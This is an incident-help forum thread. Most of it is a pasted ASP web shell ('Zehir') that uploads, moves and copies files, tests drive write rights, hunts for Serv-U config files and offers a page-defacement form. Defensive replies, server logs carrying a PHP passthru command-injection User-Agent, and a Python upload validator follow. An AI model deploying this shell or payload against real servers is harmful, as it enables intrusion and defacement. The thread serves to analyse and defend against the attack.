			If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
				Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
				Exit Property
			End If
			Set Fields = mobjFieldAry(pstrName)
		Else
			pstrName = LCase(pstrname)
			For llngIndex = 0 To mlngCount - 1
				If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
					Set Fields = mobjFieldAry(llngIndex)
					Exit Property
				End If
			Next
		End If
		Set Fields = New clsField
	End Property

	Private Sub Class_Terminate()
		Dim llngIndex
		For llngIndex = 0 To mlngCount - 1
			Set mobjFieldAry(llngIndex) = Nothing
			
		Next
		ReDim mobjFieldAry(-1)
	End Sub

	Private Sub Class_Initialize()
		ReDim mobjFieldAry(-1)
		CR = ChrB(Asc(vbCr))
		LF = ChrB(Asc(vbLf))
		CRLF = CR & LF
		mlngCount = 0
		Call RequestData
		Call ParseDelimiter()
		Call ParseData
	End Sub

	Private Function CStrU(ByRef pstrANSI)
		Dim llngLength
		Dim llngIndex
		llngLength = LenB(pstrANSI)
		For llngIndex = 1 To llngLength
			CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
		Next
	End Function

	Private Function CStrB(ByRef pstrUnicode)
		Dim llngLength
		Dim llngIndex
		llngLength = Len(pstrUnicode)
		For llngIndex = 1 To llngLength
			CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
		Next
	End Function
End Class
'####################################
Session("n1") = "byZ"
Class clsField
	Public Name
	Private mstrPath
	Public FileDir
	Public FileExt
	Public FileName
	Public ContentType
	Public Value
	Public BinaryData
	Public Length
	Private mstrText

	Public Property Get BLOB()
		BLOB = BinaryData
	End Property

	Public Function BinaryAsText()
		Dim lbinBytes
		Dim lobjRs
		If Length = 0 Then Exit Function
		If LenB(BinaryData) = 0 Then Exit Function
		
		If Not Len(mstrText) = 0 Then
			BinaryAsText = mstrText
			Exit Function
		End If
		lbinBytes = ASCII2Bytes(BinaryData)
   		mstrText = Bytes2Unicode(lbinBytes)
    	BinaryAsText = mstrText
	End Function

	Public Sub SaveAs(ByRef pstrFileName)
		Const adTypeBinary=1
		Const adSaveCreateOverWrite=2
		Dim lobjStream
		Dim lobjRs
		Dim lbinBytes
		If Length = 0 Then Exit Sub
		If LenB(BinaryData) = 0 Then Exit Sub
		Set lobjStream = Server.CreateObject("ADODB.Stream")
		lobjStream.Type = adTypeBinary
		Call lobjStream.Open()
		lbinBytes = ASCII2Bytes(BinaryData)
		Call lobjStream.Write(lbinBytes)
		
		On Error Resume Next
		
		Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
		
		'if err<>0 then response.Write "<br>"&err.Description
		
		Call lobjStream.Close()
		Set lobjStream = Nothing
	End Sub

	Public Property Let FilePath(ByRef pstrPath)
		mstrPath = pstrPath
		If Not InStrRev(pstrPath, ".") = 0 Then
			FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
			FileExt = UCase(FileExt)
		End If
		If Not InStrRev(pstrPath, "\") = 0 Then
			FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
		End If
		If Not InStrRev(pstrPath, "\") = 0 Then
			FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
		End If
	End Property

	Public Property Get FilePath()
		FilePath = mstrPath
	End Property

	private Function ASCII2Bytes(ByRef pbinBinaryData)
		Const adLongVarBinary=205
		Dim lobjRs
		Dim llngLength
		Dim lbinBuffer
		llngLength = LenB(pbinBinaryData)
		Set lobjRs = Server.CreateObject("ADODB.Recordset")
		Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
		Call lobjRs.Open()
		Call lobjRs.AddNew()
		Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
		Call lobjRs.Update()
		lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
		Call lobjRs.Close()
		Set lobjRs = Nothing
		ASCII2Bytes = lbinBuffer
	End Function

	Private Function Bytes2Unicode(ByRef pbinBytes)
		Dim lobjRs
		Dim llngLength
		Dim lstrBuffer
		llngLength = LenB(pbinBytes)
		Set lobjRs = Server.CreateObject("ADODB.Recordset")
    	Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
    	Call lobjRs.Open()
    	Call lobjRs.AddNew()
    	Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
    	Call lobjRs.Update()
    	lstrBuffer = lobjRs.Fields("BinaryData").Value
    	Call lobjRs.Close()
    	Set lobjRs = Nothing
		Bytes2Unicode = lstrBuffer
	End Function
End Class
Session("n2") = "ehir" 
'####################################
function addslash(path)
	if right(path,1)="\" then addslash=path else addslash=path & "\"
end function

sub Upload()
	dim objUpload,f,max,i,name,path,size,success
	
	set objUpload=New clsUpload

	targetPath=objUpload.Fields("folder").Value
	max=objUpload.Fields("max").Value

	for i=1 to max
		name=objUpload.Fields("file" & i).FileName
		size=objUpload.Fields("file" & i).Length
		if (name<>"") and (size>0) then
			gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
			path=addslash(targetPath) & name
			objUpload.Fields("file" & i).SaveAs path

			if objFSO.FileExists(path) then
				on error resume next
				set f=objFSO.GetFile(path)
				if IsObject(f) then
					if f.Size=size then success=true else success=false
				end if
				set f=nothing
			end if
			if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
		end if
	next
	response.Write gMsg
	set objUpload=nothing

end sub

if status="-4" then
	Upload()
'	hataKontrol
	popup=false
end if
'////////////////////////////////
sub hataKontrol
	if err<>0 then
		Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
	end if
end sub

sub araBul(path_,ara_)
	on error resume next
	If Len(path_) > 0 Then
		cur = path_&"\"
		If cur = "\\" Then cur = ""
			parent = ""
			If InStrRev(cur,"\") > 0 Then
			parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
		End If
	Else
		cur = ""
	End If
	
	Set f = objFSO.GetFolder(cur)

	Set fc = f.Files
	For Each f1 In fc
		if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
			downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
			if lcase(ara_)="mdb" then
				Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
			else 
				Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
			end if
		end if
	Next

	Set fs = f.SubFolders
	For Each f1 In fs
		araBul f1.path,ara_
	Next
	Set	f		= Nothing
	Set fc		= Nothing
	Set fs		= Nothing
end sub

sub sistemTest
	response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
	response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"

	servu_Test
	WriteTestOnDriver
	WriteTestOnLocalPath
	LocalPathParentFolder
	LocalPathPParentFolder

	response.Write "</table>"
end sub

sub servu_Test
	dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
	for each drive_ in objFSO.Drives
		if drive_.Drivetype=2 or drive_.Drivetype=3 then 
			for each d_ in dosya_
				d_ = drive_.DriveLetter&":\"&d_
				if objFSO.FileExists(d_) then
					response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
				end if
			next
		end if
	next
end sub

function yaziyomu(yol)
	on error goto 0:on error resume next
	dim sonuc__
	Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
	MyFile.write "byzehir <zehirhacker@hotmail.com>"
	set MyFile = Nothing
	if err<>0 then 
		sonuc__="<font color=red>Yazma Hakký Yok!</font>"
	else 
		sonuc__="<font color=yellow>Yazma Hakký Var!</font>"
		on error goto 0: on error resume next
		objFSO.DeleteFile yol & "\test.zehir",true
		if err<>0 then 
			sonuc__=sonuc__&"<br><font color=red>Silme Hakký Yok!</font>"
		else
			sonuc__=sonuc__&"<br><font color=yellow>Silme Hakký Var!</font>"
		end if
	end if
	yaziyomu = sonuc__
end function

function yaziyomu2(yol)
	on error goto 0:on error resume next
	Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
	MyFile.write "byzehir <zehirhacker@hotmail.com>"
	set MyFile = Nothing
	if err<>0 then 
		yaziyomu2 = false
	else 
		objFSO.DeleteFile yol & "\test.zehir"
		yaziyomu2 = true
	end if
end function

sub WriteTestOnDriver
	for each drive_ in objFSO.Drives
		if drive_.Drivetype=2 or drive_.Drivetype=3 then 
			if not yaziyomu2(drive_.DriveLetter&":\") then
				Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
			else
				Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
			end if
		end if
	next
end sub

sub WriteTestOnLocalPath
	on error goto 0
	on error resume next
	if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
		Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
	else
		Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
	end if
end sub

sub LocalPathParentFolder
	on error goto 0
	on error resume next
	hed_ = request.servervariables("APPL_PHYSICAL_PATH")
	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
	parhed_ = left(hed_,InStrRev(hed_,"\"))
	
	Set f = objFSO.GetFolder(parhed_)
	Set fc = f.SubFolders
	
	int_fol=0
	int_fil=0
	For Each f1 In fc
		int_fol=int_fol+1
	Next

	Set fc = f.files
	For Each f1 In fc
		int_fil=int_fil+1
	Next
	
	if err<>0 then
		Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
	else
		Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
	end if
end sub

sub LocalPathPParentFolder
	on error goto 0
	on error resume next
	hed_ = request.servervariables("APPL_PHYSICAL_PATH")
	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
	hed_ = left(hed_,InStrRev(hed_,"\"))
	if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
	parhed_ = left(hed_,InStrRev(hed_,"\"))
	
	Set f = objFSO.GetFolder(parhed_)
	Set fc = f.SubFolders
	int_fol=0
	int_fil=0
	For Each f1 In fc
		int_fol=int_fol+1
	Next

	Set fc = f.files
	For Each f1 In fc
		int_fil=int_fil+1
	Next
	
	if err<>0 then
		if err=451 then
			Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
		else
			Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
		end if
	else
		Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
	end if
end sub

SELECT CASE status
CASE 13 'Sistem Bilgisi
	Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
	Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
	Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
	Response.Write "</table>"
	popup = false
CASE 14 'Upload and Search
	aramaUpload
	popup = false
	hataKontrol
CASE 15 'Ms. SQL Server
	Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
	Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
	Response.Write "<input style='width:250; height:21' value='' name=path><br>"
	response.Write "<input type=submit value='SQL Servera Baðlan' style='height:23;width:170' id=submit1 name=submit1>"
	Response.Write "</td></tr></table>"
	response.Write "</form>"

	popup = false
	hataKontrol
CASE 16 'file Copy window
	Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
	Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
	Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
	response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
	Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
	response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
	response.Write "<input type=radio name='islem' value='tasi'>Tasi"
	response.Write "</table>"
	response.Write "</form>"

	popup = false
	hataKontrol
CASE 17 'file Copy 
	isl = ""
	if islem="kopyala" then
		objFSO.CopyFile path,cf
		isl="kopyalandý.." 
	elseif islem="tasi" then
		objFSO.MoveFile path,cf
		isl="taþýndý.." 
	end if
	response.Write "Dosya "&isl
	response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
	response.Write "<br>"
	popup = false
	hataKontrol
CASE 18 'folder Copy window
	Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
	Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
	Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
	Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
	response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
	Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
	response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
	response.Write "<input type=radio name='islem' value='tasi'>Tasi"
	response.Write "</table>"
	response.Write "</form>"

	popup = false
	hataKontrol
CASE 19 'folder Copy 
	isl = ""
	if islem="kopyala" then
		objFSO.CopyFolder path,cf
		isl="kopyalandý.." 
	elseif islem="tasi" then
		objFSO.MoveFolder path,cf
		isl="taþýndý.." 
	end if
	response.Write "Klasor "&isl
	response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
	response.Write "<br>"
	popup = false
	hataKontrol
CASE 33 'Powered By
	response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
	response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
	popup = false
	hataKontrol
CASE 40 'Sistem Test
	sistemTest
	popup=false
CASE 50 'Siteleri Test Edelim :D
	%>
	<table width="100%" cellpadding=0 cellspacing=0>
		<tr>
			<td align=center>
				<b>Güvenlik Testi byZehir</b>
				<br>
				<form action="<%=dosyaPath%>" method=post id=frmMesaj>
					<input type=hidden name=kuskapani value=2>
					<table width=500 align=center border=1 cellpadding=0 cellspacing=0>
						<tr>
							<td width=100>Path</td>
							<td>
                            <input style="width:100%" type=text name="Path" id="Path" value="<%=path%>" size="20"></td>
						</tr>
						<tr>
							<td width=100>Sub Folder</td>
							<td>
                            <input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www" size="20"></td>
						</tr>
						<tr>
							<td width=100>File Name</td>
							<td>
                            <input style="width:100%" type=text name="FileName" id="FileName" value="byzehir.txt" size="20"></td>
						</tr>
						<tr>
							<td colspan=2>
								<table width="100%" align=center>
									<tr>
										<td width="50%">
											<input type=checkbox name="dosya1" ID="Checkbox1" value="ON">index.htm<br>
											<input type=checkbox name="dosya2" ID="Checkbox2" value="ON">default.htm<br>
										</td>
										<td width="50%">
											<input type=checkbox name="dosya3" ID="Checkbox3" value="ON">index.asp<br>
											<input type=checkbox name="dosya4" ID="Checkbox4" value="ON">default.asp<br>
										</td>
									</tr>
								</table>
							</td>
						</tr>
						<tr>
							<td colspan=2 align=center>
								<a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
								<a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
								<a href="#" onClick="FormatText('paste')" alt="Yapýþtýr">Yapýþtýr</a>
								<a href="#" alt="Kalýn" onClick="FormatText('bold', '')">Bold</a>
								<a href="#" alt="Ýtalic" onClick="FormatText('italic', '')">Italic</a>
								<a href="#" alt="Altý Çizili" onClick="FormatText('underline', '')">UnderLine</a>
								<a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalý">JustifyLeft</a>
								<a href="#" alt="Ortada Hizalý" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
								<a href="#" onClick="FormatText('JustifyRight', '')" alt="Saða Hizalý">JustifyRight</a>
								<a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
								<a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
								<select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
                                  <option value="0" selected>-- Renk --</option>
                                  <option value="black">Siyah</option>
                                  <option value="white">Beyaz</option>
                                  <option value="blue">Mavi</option>
                                  <option value="red">Kýrmýzý</option>
                                  <option value="green">Yeþil</option>
                                  <option value="yellow">Sarý</option>
                                  <option value="orange">Turuncu</option>
                                  <option value="brown">Kahverengi</option>
                                  <option value="magenta">Pembe</option>
                                  <option value="cyan">Açýk Mavi</option>
                                  <option value="limegreen">Açýk Yeþil</option>
                                </select>
								<select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
                                  <option value="0" selected>-- Renk --</option>
                                  <option value="black">Siyah</option>
                                  <option value="white">Beyaz</option>
                                  <option value="blue">Mavi</option>
                                  <option value="red">Kýrmýzý</option>
                                  <option value="green">Yeþil</option>
                                  <option value="yellow">Sarý</option>
                                  <option value="orange">Turuncu</option>
                                  <option value="brown">Kahverengi</option>
                                  <option value="magenta">Pembe</option>
                                  <option value="cyan">Açýk Mavi</option>
                                  <option value="limegreen">Açýk Yeþil</option>
                                </select>
                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
                                  <option selected>-- Boyut --</option>
                                  <option value="1">1</option>
                                  <option value="2">2</option>
                                  <option value="3">3</option>
                                  <option value="4">4</option>
                                  <option value="5">5</option>
                                  <option value="6">6</option>
                                </select>
								<iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")&Session("n2")%>"></iframe>
								<script language=javascript>
									frames.byZehir.document.designMode = "On";
									function bgc(option){
										frames.byZehir.document.body.bgColor=option;
									}
									function FormatText(command, option){
										frames.byZehir.focus();
  										frames.byZehir.document.execCommand(command, false, option);
  										frames.byZehir.focus();
									}
									function AddImage(){	
										imagePath = prompt('Eklemek istediðiniz resmin 
</td></tr></table>


</td></tr>
<p align="center"><font face="Wingdings"><a href="Coded by Loader"><img border="0" src="http://izocin.com/personal/size.php" width="90" height="60"></a></font></p>
</tr>
</table>


0
 
govindarajan78Commented:
Do you have any file upload options in your website?
If yes, then make it strict for certain file types only.

Anyone can upload a script file such as the above code.
0
 
govindarajan78Commented:
If you add any check in JavaScript for file uploads, that may not be sufficient; the hacker might turn off JavaScript and upload files.
0
 
sitgAuthor Commented:
Thanks for your suggestion for securing the site,
but I am still trying to find the fingerprint of the hacker.
0
 
SjoerdHCommented:
The above script was probably uploaded as a jpg file, something like:

evel.asp;jpg

When this file is uploaded, IIS thinks it is a jpg file. After the upload you open this file with your browser. IIS skips all characters after the ";" and it is seen as an asp script file. When the directory where the file is uploaded has script execute enabled, it will run and your server is wide open for the hacker.

Search for asp files which have been edited lately.

All the above solutions have nothing to do with this. It is not firewall related. The file could have been uploaded by FTP, but probably you have another upload feature in one of the sites on your server.

Solution:

1: Block uploads of files with strange characters like the semicolon ";" in the file name.
2: More important: remove execute rights for scripts from the upload directory.
0
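One way to implement step 1 of the answer above on the upload handler, as an added example that is not part of the original thread. The function names, the image-only allowlist and the list of script extensions are assumptions; the check also covers related name tricks (script extension inside the name, trailing dots, path components), and the stored name is chosen by the server.

```python
import re
import uuid

# Assumption: the site only accepts image uploads; adjust to the application.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
# Illustrative list of extensions a server like the one in this thread may execute.
SCRIPT_EXTENSIONS = {".asp", ".asa", ".aspx", ".cfm", ".jsp", ".php"}

# ';' is the character the answer warns about; ':' would name an NTFS alternate
# data stream; '%' blocks encoded variants; the rest are invalid on Windows.
FORBIDDEN_CHARS = re.compile(r'[;:<>"|?*%\x00-\x1f]')


def validate_upload_name(client_name):
    """Return (ok, reason) for a client-supplied upload file name."""
    # Drop any directory part the client sent (both separator styles).
    name = re.split(r"[\\/]", client_name)[-1]
    if not name or name in (".", ".."):
        return False, "empty name"
    if FORBIDDEN_CHARS.search(name):
        return False, "forbidden character"
    # Windows strips trailing dots and spaces, so "a.asp." would land as "a.asp".
    if name != name.strip(" ."):
        return False, "leading or trailing dot/space"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    if "." + parts[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    # Reject names such as shell.asp.jpg that carry a script extension inside.
    if any("." + p in SCRIPT_EXTENSIONS for p in parts[1:-1]):
        return False, "script extension inside name"
    return True, "ok"


def storage_name(client_name):
    """Name to use on disk: random stem plus the validated extension.

    The client's own stem is never written to the upload directory.
    """
    ok, reason = validate_upload_name(client_name)
    if not ok:
        raise ValueError(reason)
    ext = "." + client_name.lower().rsplit(".", 1)[1]
    return uuid.uuid4().hex + ext
```

A name check is only one layer; step 2 of the answer (no script execute rights on the upload directory) still applies when a file slips past it.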
 
sitgAuthor Commented:
Hi SjoerdH,
Thanks for the reply.

I got the following entries in our web server log; kindly check and suggest, it will show how the hacker hacked the sites.

2010-01-08 06:42:40 W3SVC239411494 server1 192.168.0.1 GET /Default.htm - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 562
2010-01-08 06:42:40 W3SVC239411494 server1 192.168.0.1 GET /Default.htm - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 0 312
2010-01-08 06:42:41 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 281
2010-01-08 06:42:44 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.210.178 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 281
2010-01-09 03:58:10 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 359
2010-01-09 03:58:12 W3SVC239411494 server1 192.168.0.1 GET /Default.asp - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 734
2010-01-09 03:58:12 W3SVC239411494 server1 192.168.0.1 GET /favicon.ico - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 404 0 2 359
2010-01-09 03:58:13 W3SVC239411494 server1 192.168.0.1 GET /style.css - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 0 546
2010-01-09 03:58:13 W3SVC239411494 server1 192.168.0.1 GET /swfobject.js - 80 - 116.71.213.102 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 0 828
2010-01-09 04:01:09 W3SVC239411494 server1 192.168.0.1 GET /Default.asp - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 9609
2010-01-09 04:01:16 W3SVC239411494 server1 192.168.0.1 GET /default.aspx - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 500 0 0 687
2010-01-09 04:01:19 W3SVC239411494 server1 192.168.0.1 GET /homepage.swf - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/ test.com 200 0 64 9234
2010-01-09 04:01:23 W3SVC239411494 server1 192.168.0.1 GET /default.aspx - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 500 0 0 3359
2010-01-09 04:01:36 W3SVC239411494 server1 192.168.0.1 GET /Default.asp - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 10421
2010-01-09 04:03:06 W3SVC239411494 server1 192.168.0.1 GET /x.html - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - test.com 200 0 0 609
2010-01-09 04:03:07 W3SVC239411494 server1 192.168.0.1 GET /x.html - 80 - 119.153.15.162 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://test.com/x.html test.com 200 0 0 328


Regards,
Naresh
0
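The log lines in the post above share one trait: PHP code inside the User-Agent field, which no ordinary browser sends. The following added example (not part of the original thread) parses IIS W3C logs and groups such requests by client IP; the sample log is constructed, with documentation IP addresses and placeholder host names, and the function names and marker list are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in IIS W3C extended format, using the field layout shown
# in the thread. IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 06:42:40 W3SVC1 server1 192.0.2.10 GET /Default.htm - 80 - 203.0.113.7 Mozilla/5.0+(Windows;+U)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - example.test 200 0 0 562
2010-01-08 06:42:41 W3SVC1 server1 192.0.2.10 GET /favicon.ico - 80 - 203.0.113.7 Mozilla/5.0+(Windows;+U)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - example.test 404 0 2 281
2010-01-08 07:00:02 W3SVC1 server1 192.0.2.10 GET /style.css - 80 - 198.51.100.23 Mozilla/4.0+(compatible;+MSIE+8.0) http://example.test/ example.test 200 0 0 120
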